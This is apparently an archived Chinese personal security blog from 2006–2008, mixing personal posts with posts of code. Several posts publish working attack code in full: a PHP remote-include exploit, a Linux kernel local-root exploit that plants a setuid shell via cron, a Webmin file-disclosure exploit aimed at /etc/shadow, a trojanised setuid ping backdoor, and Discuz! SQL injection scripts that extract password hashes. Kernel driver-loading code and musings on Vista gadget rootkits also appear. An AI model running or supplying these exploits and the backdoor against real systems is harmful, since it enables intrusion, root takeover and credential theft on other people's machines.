PHP博客-GaRY's Blog-随笔分类-Others

新年快乐

wofeiwo — Wed, 06 Feb 2008 06:04:00 GMT

祝各位新年快乐
各位要这么想,瑞雪兆丰年嘛:)

wofeiwo 2008-02-06 14:04 发表评论

刷了手机的ROM

wofeiwo — Fri, 11 Jan 2008 18:55:00 GMT

我人比较懒,也比较笨.买了一个S1,现在才真正刷了次ROM,一点没有DIY精神.期间还经历几次失败.不过总算是弄好了,现在系统反应快了不少.装了点软件,贴几张图上来纪念一下.

wofeiwo 2008-01-12 02:55 发表评论

对Vista Gadgets的YY

wofeiwo — Wed, 09 Jan 2008 08:00:00 GMT

昨天ms补丁更新,出了两个很重量级的系统补丁.
不过也许是那两个补丁吸引了所有人的注意,却很少有人注意到另一个: Microsoft Security Advisory (943411):Improve Windows Sidebar Protection.
这引起了我的好奇,突然想起vista的Gadgets其实就是一个html+js做的一个小型applation.通过它.我们也能做一些邪恶不伤大雅的东西.
迅速翻了翻msdn,他支持的可不少啊,光是System.Shell对象就能引起无限的遐想 :)
另外,MS文章上提到的关于Gadgets权限的几点勾起了我的兴趣:

1、The MSHTML runtime is configured with the set of permissions given to HTAs or the Local Machine Zone security configuration.
2、Because gadgets are considered executable code, they can instantiate any installed ActiveX object when the option "Initialize and script ActiveX controls not marked as safe for scripting" is enabled in Internet Explorer.
3、Since gadgets can aggregate data from various locations, the option "Access data sources across domains" is enabled in Internet Explorer.
甚至连伟大的UAC也奈何不了它:
4、As an additional precaution, Sidebar Gadgets do not display the UAC elevation prompts that are used to run programs with full administrator privileges.
(这句话其实并不是如字面意思上展现的那样强大.如果一个应用程序需要UAC授权,那么当gadgets调用那个app时.那个app就会触发UAC)

这时候群里也聊到了Browser Rootkit的话题,这是不是同样也会是一个Gadget Rootkit的发展方向呢?权限大,ActiveX,System.Shell,跨域操作等等等等,请各位自己yy : )

yy不够,顺便sy一下:

没有uac提示,就弹出了cmd窗口.
当然我们最好不要单独弄一个gadget,上面的gadget只是个测试.系统自带的很多gadget都能做手脚

wofeiwo 2008-01-09 16:00 发表评论

分享两份文档

wofeiwo — Sun, 16 Dec 2007 12:09:00 GMT

Zend API : 深入PHP内核 与 Python源码剖析
原始链接分别为http://www.yanbin.org/ 与 http://blog.donews.com/lemur/category/70797.aspx?PageNumber=3

两者都是网络上发表的文档,因为是一篇一篇blog,我手工收集为doc,方便各位查看.
下面提供pdf,doc下载.

Zend API(doc+pdf)
Python源码剖析(pdf)
Python源码剖析(doc)

wofeiwo 2007-12-16 20:09 发表评论

[zt]dePython

wofeiwo — Tue, 28 Aug 2007 12:05:00 GMT

http://www.depython.net/
team509的东西，赞一个

wofeiwo 2007-08-28 20:05 发表评论

谈话记录

wofeiwo — Wed, 06 Jun 2007 10:05:00 GMT

剑心(xxxxxxx) 17:57:01
看本质就是
金钱美女
剑心(xxxxxxx) 17:57:07
金钱美色
wofeiwo(xxxxxxx) 17:57:25
再加个权力,是男人谁不想要?
剑心(xxxxxxx) 17:58:18
恩
剑心(xxxxxxx) 17:58:25
差不多齐了
剑心(xxxxxxx) 17:58:46
我说我追求金钱和美色人家都很鄙视我
剑心(xxxxxxx) 17:58:58
我说我追求事业和爱情人家都很崇拜我

wofeiwo 2007-06-06 18:05 发表评论

Ring3 Inline Hook Demo

wofeiwo — Tue, 29 May 2007 05:45:00 GMT

第一次写这种内存补丁一样的东西.开始怎么写都出错.字节码没有对齐..跳转地址算错.等等...后来用ida分析+od调试搞定.(头一次认认真真用od和ida...值得纪念)
测试环境xp sp2+vc6.0

#include <stdio.h>
#include <windows.h>

// 保存原始的5个字节代码,注意一定要保证完整
BYTE orig_code[5] = {0x90, 0x90, 0x90, 0x90, 0x90};
// JMP 0xXXXXXXXX
BYTE hook_code[5] = { 0xe9, 0, 0, 0, 0 };
BYTE jmp_orig_code[5] = { 0xe9, 0, 0, 0, 0};

int func();
int fake_func();
void hook_func();
int jmp_back();

int main(int argc, char **argv)
{
    int ret;
    hook_func();
    ret = func();
    return ret;
}

int func()
{
    printf("I'm func(),I'm called!\r\n");
    return 0;
}

void hook_func()
{
    DWORD dwOldProtect;
    if(!VirtualProtect(func, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect))
    {
        printf("VirtualProtect error!\r\n");
        return;
    }
    if(!VirtualProtect(jmp_back, 12, PAGE_EXECUTE_READWRITE, &dwOldProtect))
    {
        printf("VirtualProtect error!\r\n");
        return;
    }

    // 保存原始操作码
    memcpy(orig_code, (BYTE *)func, 5);
    // 计算fack_func地址
    *((ULONG*)(hook_code+1) ) = (ULONG)fake_func - (ULONG)func - 5;
    // 修改原始入口
    memcpy((BYTE *)func, hook_code, 5);
    // 计算跳回地址
    *( (ULONG*)(jmp_orig_code+1) ) = (ULONG)func - (ULONG)jmp_back -5;
    // 填充jmp_back
    memcpy((BYTE *)jmp_back, orig_code, 5);
    memcpy((BYTE *)jmp_back+5, jmp_orig_code, 5);
}

__declspec(naked) int jmp_back()
{
    __asm
    {
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
        _emit 0x90
    }
}

int fake_func()
{
    int ret;
    printf("I'm fake_func(),I'm called!\r\n");
    ret = jmp_back();
    return ret;
}

测试结果:

参考: http://www.whitecell.org/forums/viewthread.php?tid=360

wofeiwo 2007-05-29 13:45 发表评论

Why?

wofeiwo — Mon, 28 May 2007 14:41:00 GMT

Who can tell me why?
我系统是xp + .net framework 2.0

try
{
$CmdProcess = new DOTNET("System","System.Diagnostics.Process") or die("cannot create .net process object");
}
catch(Exception $e)
{
die($e->getMessage());
}
$CmdProcess->Start("cmd.exe");
?>

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

D:\APMServ\www\htdocs>php netexec.php
Failed to instantiate .Net object [CreateInstance] [0x80070002] 系统找不到指定的
文件。

D:\APMServ\www\htdocs>

wofeiwo 2007-05-28 22:41 发表评论

小东西

wofeiwo — Tue, 22 May 2007 08:12:00 GMT

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:

php
/*
*
* PHP include file exploit
* Modified by wofeiwo
* Date: Jun 24th 2006
*
*/

function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
  if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
   if (is_string($var)) {
    $array[$key] = stripslashes($var);
   }
   if (is_array($var))  {
    $array[$key] = stripslashes_array($var);
   }
  }
}
return $array;
}

if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}

$server=isset($_POST['server'])?$_POST['server']:"";
$file=isset($_POST['file'])?$_POST['file']:"";
$iszero=isset($_POST['iszero'])?"checked":"";
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";
?>

<style>
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
        font-family: "Verdana";
        font-size: "10px";
        BACKGROUND-COLOR: "#FFFFFF";
        height: "18px";
        border: "2px solid #666666";
}
style>

<center><b>PHP include file exploitb><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0font>center><br><br>
<form action="" method="post" >
target server : <br>
<input type="text" name="server" value=""><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value=""><br>
add "%00": <input type="checkbox" $iszero?> name="iszero"><br><br>
exec (enclose php commands between <? .. ?> tags):<br>
<input type="text" name="cmd" value="" ><br><br>
<INPUT type="submit" value="send">
form>

php
if(isset($_POST['cmd']))
{
$zerochar = $iszero == "checked"?"%00":"";
$message  = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: fr\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cache-Control: no-cache\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "

";
while(!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="

";
echo $resp;
}
?>

这个是当时linux kernel PRCTL loacl poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)

/********************************************************/
/* Local r00t Exploit for:                              */
/* Linux Kernel PRCTL Core Dump Handling                */
/* Modified by wofeiwo [13.Jul.2006] (chage shellcode)  */
/*------------------------------------------------------*/
/* Based on:                                            */
/*------------------------------------------------------*/
/* By:                                                  */
/* - dreyer       (main PoC code)      */
/* - RoMaNSoFt  (local root code)    */
/*                                  [ 10.Jul.2006 ]     */
/********************************************************/

#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   echo -e \"#include \\nint main(){\\nsetuid(0);setgid(0);setreuid(0);system(\\\"/bin/sh\\\");return 0;\\n}\\n\" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("Last modified By: wofeiwo (chage shellcode)\n");
    printf("Last edited: [ 13.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(63);

    printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
    system("/tmp/fakesh");
    return 0;
}

python写的,去年webmin 一个高危漏洞的exp

#!/usr/bin/python
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006

import sys, urllib, os

def usage (name):
    print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo \n\nUsage: %s  \nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)

def main ():
    if len(sys.argv) != 3:
        (filepath, filename) = os.path.split(sys.argv[0])
        usage(filename)
        sys.exit(-1)
    else:
        target = sys.argv[1] + "unauthenticated" + "/..%01"*61 + "/" + sys.argv[2]
        sock = urllib.urlopen(target)
        getfile = sock.read()
        sock.close()
        print getfile

if __name__ == "__main__": main()

n年前写的替换系统ping的后门,因为ping是有s位的:)

#include
#include
#include
#include
#include
#include
#include
#include
#include

#define PWD "wofeiwo"

/* init the daemon, if success return 0 other <0 */
int daemon_init()
{
    struct sigaction act;
    int i, maxfd;

    if(fork() != 0) exit(0);
    if(setsid() < 0) return(-1);

    act.sa_handler = SIG_IGN;
    /*act.sa_mask = 0;*/
    act.sa_flags = 0;

    sigaction(SIGHUP, &act, 0);

    if(fork() != 0) exit(0);

    chdir("/");
    umask(0);
    maxfd = sysconf(_SC_OPEN_MAX);
    for(i=0; i<maxfd; i++)
    close(i);
    open("/dev/null", O_RDWR);
    dup(0);
    dup(1);
    dup(2);
    return(0);
}

int main(int argc, char *argv[])
{
    int i,j=0;
    char argv_execv[52][128];
    char usage[]=
    "Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
        "            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
        "            [-M mtu discovery hint] [-S sndbuf]\n"
        "            [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

    if (argc == 1) printf("%s", usage);
    if (argc > 1)
    {
        if (strcmp(PWD, argv[1]) == 0)
        {
            signal(SIGCHLD, sig_chid);
            daemon_init();
            seteuid(0);
            setuid(0);
            setgid(0);
            system("/bin/bash");
            return 1;
        }
        else
        {
            for (i = argc; i > 0; i--)
            {
                strcpy(argv_execv[j],argv[j]);
                j++;
            }
            strcpy(argv_execv[j], "\0");
            execv("/bin/ping", argv);
            return 1;
        }
    }
    return 0;
}

最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的

/*
*
* Discuz! 5.0.0 RC1 SQL injection PoC
* Author: wofeiwo thx superheis help
* Date: Aug 24th 2006
*
*/

#include
#include
#include
#include

#pragma comment (lib,"ws2_32")

#define PASSLEN 32

char *HMod[] =            { "GET","POST"};
char *HttpVer[] =        { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] =        { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"};
char *HAcceptLg[] =        { "Accept-Language:"," zh-cn"};
char *HContentTp[]=        { "Content-Type:"," application/x-www-form-urlencoded"};
char *HAcceptEn[] =        { "Accept-Encoding:"," gzip, deflate"};
char *HUserAgent[]=        { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char *HReferer[]=        { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char *HHost[]=            { "Host: "};
char *HContentLg[]=      { "Content-Length:"," 189"};
char *HContion[]=        { "Connection:"," Keep-Alive"};
char *HCacheCtr[]=        { "Cache-Control:"," no-cache"};
char *HXForwardedFor[]=    { "X-Forwarded-For:"};
char *HCookie[]=        { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char *HPost[]=            { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];

char temp1[1024],temp2[10240] = {0};


int sanddata(char *host, int port, char *path, char *uid, int ascii, int chrnum)
{
    WSADATA  WSAData={0};
    struct hostent *he;
    struct sockaddr_in  ServerAddr={0};
    SOCKET Socket=0;
    int ren = 0;
    char *p = NULL;

    if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

    if((he = gethostbyname(host)) == 0)
    {
        fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
        exit(-1);
    }

    Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);


    ServerAddr.sin_family = AF_INET;
    ServerAddr.sin_addr = *((struct in_addr *)he->h_addr);
    ServerAddr.sin_port = htons(port);

    memset(temp1,0,1024);
    sprintf(querystring, query, uid, chrnum, ascii);
    sprintf(temp1,    "%s %s%s %s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "%s%s\r\n"
                    "\r\n"
                    "%s\r\n"
                    "\r\n\r\n"
                    ,
                    HMod[1],path,"logging.php?action=login",HttpVer[1],
                    HAccept[0],HAccept[1],
                    HAcceptLg[0],HAcceptLg[1],
                    HContentTp[0],HContentTp[1],
                    HAcceptEn[0],HAcceptEn[1],
                    HUserAgent[0],HUserAgent[1],
                    HReferer[0],HReferer[1],
                    HHost[0],host,
                    HContentLg[0]," 0",
                    HContion[0],HContion[1],
                    HCacheCtr[0],HCacheCtr[1],
                    HXForwardedFor[0],querystring,
                    HCookie[0],HCookie[1],
                    HPost[0]
                    );
    if (chrnum == 1) printf("\r\n%s\r\n",temp1);

    connect(Socket,(SOCKADDR *)&ServerAddr,sizeof(ServerAddr));

    send(Socket,temp1,strlen(temp1),0);
    //sleep(1);
    while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

    if (chrnum == 1) printf("\r\n%s\r\n",temp2);
    if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
    {
        fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
        exit(1);
    }
    if((p = strstr(temp2, "ip3")) == NULL)
    {
        close(Socket);
        return ascii;
    }

    close(Socket);
    return 0;
}

int main(int argc,char *argv[])
{
    int i = 0,j = 0,ret = 0;

    fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
    fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

    if(argc != 5)
    {
        fprintf(stderr, "Usage: %s    \r\n", argv[0]);
        fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
        exit(1);
    }

    fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
    fprintf(stdout, "[+] Trying ..\r\n");
    fprintf(stdout, "[+] Plz wait a monment ..\r\n");
    fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

    for(j = 1; j <= PASSLEN; j++)
    {
        for(i = 48; i < 58; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        for(i = 98; i < 123; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        finded: ret = 0;
    }

    fprintf(stdout, "\r\n");
    fprintf(stdout, "[+] Finished\r\n");

    return 0;
}

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
    def __init__ (self, threadname, url, u):
        self.realurl = url
        self.realu = u
        threading.Thread.__init__(self, name = threadname)

    def run (self):
        lenth = 32
        injection(lenth, self.realurl, self.realu, self.getName())

def  injection (lenthofpass, realurl, path, num):

        ran = range(97, 123)
        for a in range(48, 58): ran.append(a)

        for i in ran:

            query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            #print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request("POST", path + "logging.php?action=login&",data , header)
            sleep(1)
            response = http.getresponse()
            re1 = response.read()
            if re1.find('SELECT') == -1:
                print '[-] Unvalnerable host'
                print '[-] Exit..'
                sys.exit(1);

            elif re1.find('ip3') == -1:
                password[int(num)] = chr(i)
                #print '[+] password ' + num + ': ' + chr(i)
                http.close()
                sleep(1)
                break
            #print re1
            #print '-----------------------------------------------'
            http.close()
            sleep(1)

def main ():
    print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
    print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    if len(sys.argv) == 3:
        url = urlparse(sys.argv[1])
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2]
    else:
        print "Usage: %s  " % sys.argv[0]
        print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)

    print '[+] Connect %s' % url[1]
    print '[+] Begin threads'
    print '[+] Plz wait a long long time'

    for a in range(1,33) :
        thread = creatthread(str(a), url, u)
        thread.start()

    while threading.activeCount() != 1:
        continue
    else:
        sys.stdout.write( '[+] The uid=' + sys.argv[2] + ' password hash is: ' )
        for n in range(1, 33) :
            sys.stdout.write(password[n])
        sys.stdout.write('\n[+] Finished \n')


if __name__ == '__main__': main()

wofeiwo 2007-05-22 16:12 发表评论

使用ZwSetSystemInformation加载驱动

wofeiwo — Tue, 08 May 2007 12:54:00 GMT

#include
#include
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define SystemLoadAndCallImage 38

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;

int main(int argc, char *argv[])
{
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
    UNICODE_STRING TmpBuff;
    char    szDrvFullPath[256],szTmp[256];
    int iBuffLen;

    printf("Load driver with ZwSetSystemInformation( )\r\n");
    printf("Date: 8th May 2007\r\n");
    printf("Modifed by: GaRY \r\n\r\n");
    if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
    {
        printf("Usage: %s \r\n", argv[0]);
        exit(-1);
    }

    // 从ntll.dll获取函数
    if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"),  "RtlInitUnicodeString" )) )
    {
        printf( "GetProcAddress(\"RtlInitUnicodeString\") Error:%d\n", GetLastError() );
        exit(1);
    }
    if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
    {
        printf( "GetProcAddress(\"ZwSetSystemInformation\") Error:%d\n", GetLastError() );
        exit(1);
    }
    if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
    {
        printf( "GetProcAddress(\"ZwSetSystemInformation\") Error:%d\n", GetLastError() );
        exit(1);
    }

    GetFullPathName(argv[1], 256, szTmp, NULL);
    printf("Loading driver: %s\r\n", szTmp);
    iBuffLen = sprintf(szDrvFullPath, "\\??\\%s", szTmp);
    szDrvFullPath[iBuffLen]=0;
    TmpBuff.Buffer = (PVOID)szDrvFullPath;
    TmpBuff.Length = iBuffLen;
    RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);

    if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))     //加载进内核空间
    {
        printf("Driver: %s loaded.\r\n", szDrvFullPath);
    }
    else
    {
        printf("Driver: %s not loaded.\r\n", szDrvFullPath);
    }
    return true;
}

wofeiwo 2007-05-08 20:54 发表评论

使用ZwLoadDriver加载驱动

wofeiwo — Tue, 08 May 2007 07:12:00 GMT

#include
#include

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PVOID Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;

typedef LSA_UNICODE_STRING UNICODE_STRING, *PUNICODE_STRING;

// 申明ntdll中使用的函数
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;
typedef DWORD (CALLBACK* RTLFREEUNICODESTRING)(PVOID);
RTLFREEUNICODESTRING RtlFreeUnicodeString;
typedef DWORD (CALLBACK* ZWLOADDRIVER)(PVOID);
ZWLOADDRIVER ZwLoadDriver;

int LoadDriver(char * szDrvName, char * szDrvPath)
{
    //修改注册表启动驱动程序
    char szSubKey[200], szDrvFullPath[256];
    LSA_UNICODE_STRING buf1;
    LSA_UNICODE_STRING buf2;
    int iBuffLen;
    HKEY hkResult;
    char Data[4];
    DWORD dwOK;
    iBuffLen = sprintf(szSubKey,"System\\CurrentControlSet\\Services\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    dwOK = RegCreateKey(HKEY_LOCAL_MACHINE,szSubKey,&hkResult);
    if(dwOK!=ERROR_SUCCESS)
        return false;
    Data[0]=1;
    Data[1]=0;
    Data[2]=0;
    Data[3]=0;
    dwOK=RegSetValueEx(hkResult,"Type",0,4,(const unsigned char *)Data,4);
    dwOK=RegSetValueEx(hkResult,"ErrorControl",0,4,(const unsigned char *)Data,4);
    dwOK=RegSetValueEx(hkResult,"Start",0,4,(const unsigned char *)Data,4);
    GetFullPathName(szDrvPath, 256, szDrvFullPath, NULL);
    printf("Loading driver: %s\r\n", szDrvFullPath);
    iBuffLen = sprintf(szSubKey,"\\??\\%s",szDrvFullPath);
    szSubKey[iBuffLen]=0;
    dwOK=RegSetValueEx(hkResult,"ImagePath",0,1,(const unsigned char *)szSubKey,iBuffLen);
    RegCloseKey(hkResult);
    iBuffLen = sprintf(szSubKey,"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    buf2.Buffer = (PVOID)szSubKey;
    buf2.Length = iBuffLen;
    RtlAnsiStringToUnicodeString(&buf1,&buf2,1);
    //加载驱动程序
    dwOK = ZwLoadDriver(&buf1);
    RtlFreeUnicodeString(&buf1);
    iBuffLen=sprintf(szSubKey,"%s%s\\Enum","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    //删除注册表项
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"%s%s\\Security","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"%s%s","System\\CurrentControlSet\\Services\\",szDrvName);
    szSubKey[iBuffLen]=0;
    RegDeleteKey(HKEY_LOCAL_MACHINE,szSubKey);
    iBuffLen=sprintf(szSubKey,"\\\\.\\%s",szDrvName);
    szSubKey[iBuffLen]=0;
    return true;
}

int main(int argc, char *argv[])
{
    printf("Load driver with ZwLoadDriver( )\r\n");
    printf("Date: 8th May 2007\r\n");
    printf("Modifed by: GaRY \r\n\r\n");
    if(argc != 3)
    {
        printf("Usage: %s  \r\n", argv[0]);
        exit(-1);
    }
    HMODULE hNtdll = NULL;
    hNtdll = LoadLibrary( "ntdll.dll" );

    //从ntdll.dll里获取函数
    if ( !hNtdll )
    {
        printf( "LoadLibrary( NTDLL.DLL ) Error:%d\n", GetLastError() );
        return false;
    }

    RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING)
        GetProcAddress( hNtdll, "RtlAnsiStringToUnicodeString");
    RtlFreeUnicodeString = (RTLFREEUNICODESTRING)
        GetProcAddress( hNtdll, "RtlFreeUnicodeString");
    ZwLoadDriver = (ZWLOADDRIVER)
        GetProcAddress( hNtdll, "ZwLoadDriver");

    //注册驱动程序
    if(LoadDriver(argv[1], argv[2]) == false) return false;
    return true;
}

wofeiwo 2007-05-08 15:12 发表评论

暂停更新一段时间...

wofeiwo — Sat, 09 Dec 2006 03:51:00 GMT

准备考试咯.暂停更新一段时间.放假了就空了

wofeiwo 2006-12-09 11:51 发表评论

Zend Core (Windows Technology Preview)

wofeiwo — Mon, 27 Nov 2006 08:09:00 GMT

http://www.zend.com/products/zend_core/windows_preview?WT.mc_id=Core_win_hp

找了找,现在能Optimize PHP 5.2.0的也只有这个了

wofeiwo 2006-11-27 16:09 发表评论

好久没更新

wofeiwo — Sat, 30 Sep 2006 10:02:00 GMT

忙,等等还要研究lifetype去

wofeiwo 2006-09-30 18:02 发表评论

关于Discuz! 5.0.0 RC1的PoC

wofeiwo — Fri, 15 Sep 2006 13:45:00 GMT

这里把网上公布的code也贴出来:

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
